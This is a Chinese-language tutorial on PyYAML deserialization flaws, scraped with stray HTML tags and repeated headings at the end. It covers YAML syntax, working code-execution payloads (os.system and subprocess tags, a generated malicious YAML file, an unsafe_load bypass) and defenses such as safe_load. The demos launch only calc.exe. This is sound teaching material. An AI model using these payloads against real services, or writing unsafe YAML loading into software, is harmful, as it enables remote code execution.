PyYAML反序列化漏洞深度解析<\/h1>

1. YAML基础<\/h2>

1.1 YAML简介<\/h3>

YAML是一种直观的数据序列化格式，具有以下特点：<\/p>

容易被电脑识别<\/li>
人类可读性强<\/li>
与脚本语言交互简单<\/li>

语法比XML更简洁<\/li> <\/ul>

1.2 YAML基本语法规则<\/h3>

大小写敏感<\/li>
使用缩进表示层级关系<\/li>
缩进只允许使用空格（不允许Tab）<\/li>
缩进空格数目不重要，只要同层级元素左对齐<\/li>

#<\/code>表示注释<\/li>
<\/ul>
1.3 YAML数据结构表示<\/h3>
字典表示<\/h4>
name<\/span>: Al1ex<\/span>
<\/span><\/span>age<\/span>: 0<\/span>
<\/span><\/span>job<\/span>: Tester<\/span>
<\/span><\/span><\/code><\/pre>Python输出：<\/p>
{'name'<\/span>: 'Al1ex'<\/span>, 'age'<\/span>: 0<\/span>, 'job'<\/span>: 'Tester'<\/span>}
<\/span><\/span><\/code><\/pre>列表表示<\/h4>
- Al1ex<\/span>
<\/span><\/span>- 0<\/span>
<\/span><\/span>- Tester<\/span>
<\/span><\/span><\/code><\/pre>Python输出：<\/p>
['Al1ex'<\/span>, 0<\/span>, 'Tester'<\/span>]
<\/span><\/span><\/code><\/pre>复合结构<\/h4>
- name<\/span>: Al1ex<\/span>
<\/span><\/span>  age<\/span>: 0<\/span>
<\/span><\/span>  job<\/span>: Tester<\/span>
<\/span><\/span>- name<\/span>: James<\/span>
<\/span><\/span>  age<\/span>: 30<\/span>
<\/span><\/span><\/code><\/pre>Python输出：<\/p>
[{'name'<\/span>: 'Al1ex'<\/span>, 'age'<\/span>: 0<\/span>, 'job'<\/span>: 'Tester'<\/span>}, {'name'<\/span>: 'James'<\/span>, 'age'<\/span>: 30<\/span>}]
<\/span><\/span><\/code><\/pre>1.4 YAML基本数据类型<\/h3>

字符串<\/li>
整型<\/li>
浮点型<\/li>
布尔型<\/li>
null（可用~<\/code>表示）<\/li>
时间（ISO8601格式）<\/li>
日期（ISO8601格式）<\/li>
<\/ul>
示例：<\/p>
str<\/span>: "Hello World!"<\/span>
<\/span><\/span>int<\/span>: 110<\/span>
<\/span><\/span>float<\/span>: 3.141<\/span>
<\/span><\/span>boolean<\/span>: true<\/span>
<\/span><\/span>None<\/span>: null<\/span>
<\/span><\/span>time<\/span>: 2020-06-20<\/span>t11:43:30.20+08:00<\/span>
<\/span><\/span>date<\/span>: 2020-06-20<\/span>
<\/span><\/span><\/code><\/pre>1.5 引用与强制类型转换<\/h3>
引用<\/h4>
name<\/span>: &name<\/span> Al1ex<\/span>
<\/span><\/span>tester<\/span>: *name<\/span>
<\/span><\/span><\/code><\/pre>相当于：<\/p>
name<\/span>: Al1ex<\/span>
<\/span><\/span>tester<\/span>: Al1ex<\/span>
<\/span><\/span><\/code><\/pre>强制类型转换<\/h4>
使用!!<\/code>实现：<\/p>
str<\/span>: !!str<\/span> 3.14<\/span>
<\/span><\/span>int<\/span>: !!int<\/span> "123"<\/span>
<\/span><\/span><\/code><\/pre>输出：<\/p>
{'int'<\/span>: 123<\/span>, 'str'<\/span>: '3.14'<\/span>}
<\/span><\/span><\/code><\/pre>1.6 分段规则<\/h3>
使用---<\/code>分隔多个文档：<\/p>
---
<\/span><\/span>name<\/span>: James<\/span>
<\/span><\/span>age<\/span>: 20<\/span>
<\/span><\/span>---
<\/span><\/span>name<\/span>: Lily<\/span>
<\/span><\/span>age<\/span>: 19<\/span>
<\/span><\/span><\/code><\/pre>2. PyYAML高级用法<\/h2>
2.1 yaml.YAMLObject<\/h3>
使用元类注册构造器和表示器：<\/p>
import<\/span> yaml
<\/span><\/span>
<\/span><\/span>class<\/span> Person<\/span>(yaml.<\/span>YAMLObject):
<\/span><\/span>    yaml_tag =<\/span> '!person'<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> __init__(self, name, age):
<\/span><\/span>        self.<\/span>name =<\/span> name
<\/span><\/span>        self.<\/span>age =<\/span> age
<\/span><\/span>    
<\/span><\/span>    def<\/span> __repr__(self):
<\/span><\/span>        return<\/span> '<\/span>%s<\/span>(name=<\/span>%s<\/span>, age=<\/span>%d<\/span>)'<\/span> %<\/span> (self.<\/span>__class__.<\/span>__name__, self.<\/span>name, self.<\/span>age)
<\/span><\/span>
<\/span><\/span>james =<\/span> Person('James'<\/span>, 20<\/span>)
<\/span><\/span>print(yaml.<\/span>dump(james))  # Python对象转yaml<\/span>
<\/span><\/span>
<\/span><\/span>lily =<\/span> yaml.<\/span>load('!person {name: Lily, age: 19}'<\/span>)
<\/span><\/span>print(lily)  # yaml转Python对象<\/span>
<\/span><\/span><\/code><\/pre>2.2 add_constructor\/add_representer<\/h3>
定义普通类并添加构造器和表示器：<\/p>
import<\/span> yaml
<\/span><\/span>
<\/span><\/span>class<\/span> Person<\/span>(object):
<\/span><\/span>    def<\/span> __init__(self, name, age):
<\/span><\/span>        self.<\/span>name =<\/span> name
<\/span><\/span>        self.<\/span>age =<\/span> age
<\/span><\/span>    
<\/span><\/span>    def<\/span> __repr__(self):
<\/span><\/span>        return<\/span> 'Person(<\/span>%s<\/span>, <\/span>%s<\/span>)'<\/span> %<\/span> (self.<\/span>name, self.<\/span>age)
<\/span><\/span>
<\/span><\/span># 添加表示器<\/span>
<\/span><\/span>def<\/span> person_repr<\/span>(dumper, data):
<\/span><\/span>    return<\/span> dumper.<\/span>represent_mapping(u<\/span>'!person'<\/span>, {"name"<\/span>: data.<\/span>name, "age"<\/span>: data.<\/span>age})
<\/span><\/span>yaml.<\/span>add_representer(Person, person_repr)
<\/span><\/span>
<\/span><\/span># 添加构造器<\/span>
<\/span><\/span>def<\/span> person_cons<\/span>(loader, node):
<\/span><\/span>    value =<\/span> loader.<\/span>construct_mapping(node)
<\/span><\/span>    return<\/span> Person(value['name'<\/span>], value['age'<\/span>])
<\/span><\/span>yaml.<\/span>add_constructor(u<\/span>'!person'<\/span>, person_cons)
<\/span><\/span><\/code><\/pre>2.3 PyYAML常用方法<\/h3>
load() - 返回对象<\/h4>
import<\/span> yaml
<\/span><\/span>f =<\/span> open('config.yml'<\/span>, 'r'<\/span>)
<\/span><\/span>y =<\/span> yaml.<\/span>load(f)
<\/span><\/span>print(y)
<\/span><\/span><\/code><\/pre>load_all() - 生成迭代器<\/h4>
用于包含多块yaml文档的情况<\/p>
dump() - Python对象转yaml<\/h4>
aproject =<\/span> {'name'<\/span>: 'Silenthand Olleander'<\/span>, 'race'<\/span>: 'Human'<\/span>, 'traits'<\/span>: ['ONE_HAND'<\/span>, 'ONE_EYE'<\/span>]}
<\/span><\/span>print(yaml.<\/span>dump(aproject))
<\/span><\/span><\/code><\/pre>dump_all() - 多段输出到文件<\/h4>
obj1 =<\/span> {"name"<\/span>: "James"<\/span>, "age"<\/span>: 20<\/span>}
<\/span><\/span>obj2 =<\/span> ["Lily"<\/span>, 19<\/span>]
<\/span><\/span>with<\/span> open('yaml_dump_all.yml'<\/span>, 'w'<\/span>) as<\/span> f:
<\/span><\/span>    yaml.<\/span>dump_all([obj1, obj2], f)
<\/span><\/span><\/code><\/pre>3. PyYAML反序列化漏洞<\/h2>
3.1 漏洞原理<\/h3>
PyYAML在反序列化时，可以通过特殊标签动态创建Python对象并执行任意代码。<\/p>
关键标签：<\/p>

!!python\/object:<\/code> => Constructor.construct_python_object<\/code><\/li>
!!python\/object\/apply:<\/code> => Constructor.construct_python_object_apply<\/code><\/li>
!!python\/object\/new:<\/code> => Constructor.construct_python_object_new<\/code><\/li>
<\/ul>
这些标签最终都会调用make_python_instance()<\/code>函数，该函数会根据参数动态创建新的Python类对象或通过引用module的类创建对象。<\/p>
3.2 漏洞利用（PyYAML <5.1）<\/h3>
通用POC<\/h4>
!!python\/object\/apply:os.system<\/span> ["calc.exe"<\/span>]
<\/span><\/span>!!python\/object\/new:os.system<\/span> ["calc.exe"<\/span>]
<\/span><\/span>!!python\/object\/new:subprocess.check_output<\/span> [["calc.exe"<\/span>]]
<\/span><\/span>!!python\/object\/apply:subprocess.check_output<\/span> [["calc.exe"<\/span>]]
<\/span><\/span><\/code><\/pre>示例代码<\/h4>
生成恶意yaml文件：<\/p>
import<\/span> yaml
<\/span><\/span>
<\/span><\/span>class<\/span> poc<\/span>:
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        import<\/span> os
<\/span><\/span>        os.<\/span>system('calc.exe'<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> yaml.<\/span>dump(poc())
<\/span><\/span>with<\/span> open('simple.yml'<\/span>, 'w'<\/span>) as<\/span> f:
<\/span><\/span>    f.<\/span>write(payload)
<\/span><\/span><\/code><\/pre>反序列化执行：<\/p>
import<\/span> yaml
<\/span><\/span>
<\/span><\/span>with<\/span> open('simple.yml'<\/span>, 'r'<\/span>) as<\/span> f:
<\/span><\/span>    yaml.<\/span>load(f)
<\/span><\/span><\/code><\/pre>3.3 PyYAML >=5.1的变化<\/h3>
加载器类型<\/h4>

BaseLoader<\/code>: 仅加载最基本的YAML<\/li>
SafeLoader<\/code>: 安全加载YAML子集（推荐用于不受信任的输入，对应safe_load<\/code>）<\/li>
FullLoader<\/code>: 加载完整YAML语言，避免任意代码执行（默认加载器，对应full_load<\/code>）<\/li>
UnsafeLoader<\/code>(原Loader<\/code>): 原始Loader代码，易被利用（对应unsafe_load<\/code>）<\/li>
<\/ul>
绕过方法<\/h4>
使用subprocess.Popen<\/code>绕过限制：<\/p>
from<\/span> yaml import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> b<\/span>"""
<\/span><\/span><\/span>!!python\/object\/apply:subprocess.Popen
<\/span><\/span><\/span>- calc
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>deserialized_data =<\/span> load(data, Loader=<\/span>Loader)  # 或使用unsafe_load(data)<\/span>
<\/span><\/span>print(deserialized_data)
<\/span><\/span><\/code><\/pre>3.4 ruamel.yaml的情况<\/h3>
ruamel.yaml默认支持YAML 1.2版本，同样存在类似漏洞：<\/p>
from<\/span> ruamel.yaml import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> """
<\/span><\/span><\/span>!!python\/object\/apply:subprocess.Popen
<\/span><\/span><\/span>- calc
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>deserialized_data =<\/span> load(data)  # 命令会被执行<\/span>
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>
4.1 安全反序列化方法<\/h3>
使用以下安全函数处理YAML数据：<\/p>

safe_load()<\/code><\/li>
safe_load_all()<\/code><\/li>
full_load()<\/code><\/li>
full_load_all()<\/code><\/li>
<\/ul>
4.2 安全序列化方法<\/h3>
使用以下函数序列化数据：<\/p>

safe_dump()<\/code><\/li>
safe_dump_all()<\/code><\/li>
<\/ul>
4.3 其他建议<\/h3>

升级到最新版PyYAML<\/li>
避免直接使用load()<\/code>和load_all()<\/code>方法<\/li>
对用户输入的YAML数据进行严格过滤<\/li>
使用更安全的替代方案，如JSON<\/li>
<\/ul>

PyYAML反序列化漏洞深度解析<\/h1>

1. YAML基础<\/h2>

1.3 YAML数据结构表示<\/h3>

1.5 引用与强制类型转换<\/h3>

2. PyYAML高级用法<\/h2>

2.3 PyYAML常用方法<\/h3>

load_all() - 生成迭代器<\/h4> 用于包含多块yaml文档的情况<\/p>

3. PyYAML反序列化漏洞<\/h2>

3.3 PyYAML >=5.1的变化<\/h3>

4. 防御措施<\/h2>

4.3 其他建议<\/h3> 升级到最新版PyYAML<\/li> 避免直接使用load()<\/code>和load_all()<\/code>方法<\/li> 对用户输入的YAML数据进行严格过滤<\/li> 使用更安全的替代方案，如JSON<\/li> <\/ul>

load_all() - 生成迭代器<\/h4>
用于包含多块yaml文档的情况<\/p>

4.3 其他建议<\/h3>

升级到最新版PyYAML<\/li>
避免直接使用`load()<\/code>和load_all()<\/code>方法<\/li>`
`对用户输入的YAML数据进行严格过滤<\/li>`
`使用更安全的替代方案，如JSON<\/li> <\/ul>`